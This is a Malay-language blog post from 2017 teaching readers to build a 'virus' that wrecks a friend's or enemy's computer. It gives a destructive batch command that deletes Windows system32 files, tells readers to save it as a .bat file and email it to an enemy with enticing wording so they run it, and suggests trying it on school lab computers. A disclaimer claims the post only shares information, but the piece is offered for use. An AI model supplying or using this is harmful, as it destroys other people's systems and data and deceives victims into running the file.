Friday, 14 July 2017

Buat Virus untuk musnahkan kawan

Annyeonghaseyo
 안녕하세요


Hari ni Az akn mngajar korang bagaimana untuk memusnahkan mana-mana 
komputer dengan hanya menggunakan email atau internet  sahaja. Cara nya agak 
mudah dan coOL.Dimana korang boleh menjahanamkan mana2  komputer mengakibatkan
si pengguna tidak dapat switch on komputer diorang selamanya. SELAMANYA

ATTENTION PLEZZZ!!!!!!
Az tidak akan bertanggungjawab jika terjadi apa-apa yang berlaku sama ada 
komputer korang atau computer org lain..Tujuan post ini adalah untuk berkongsi maklumat semata-mata.

Step 1 ::
 copy kod merah dekat bawah  ni

del c:\WINDOWS\system32\*.*/q

Step 2 ::
 Buka notepad dan paste kod diatas.

Step 3 ::
Simpan kod ni apa-apa nama sekalipun tetapi belakang nya mestade  ".bat "
Contoh "stupid.bat".

JANGAN SESEKALI KORANG DOUBLE KLIK DEKAT NOTEPAD yang korang simpan tu..kalau tak menyesal gilew ahh…

Step 5 ::
 korang attach dekat email untuk hantar ke musuh.

Step 6 ::
korang tulis la ape-apa sekalipun ket email untuk suruh musuh korang download
dan tekan kod tu.Ayat tu biarlah cool ckit..
Apabila musuh anda download dan buka file td. Secara automatik dan lansungnya komputer diorang akan rosak.

p/s :: Korang boleh juga menggunakan cara gilew dgn copy paste kat computer makmal skolah
          korang..mesti gempak laa

Related Articles

0 comments:

Post a Comment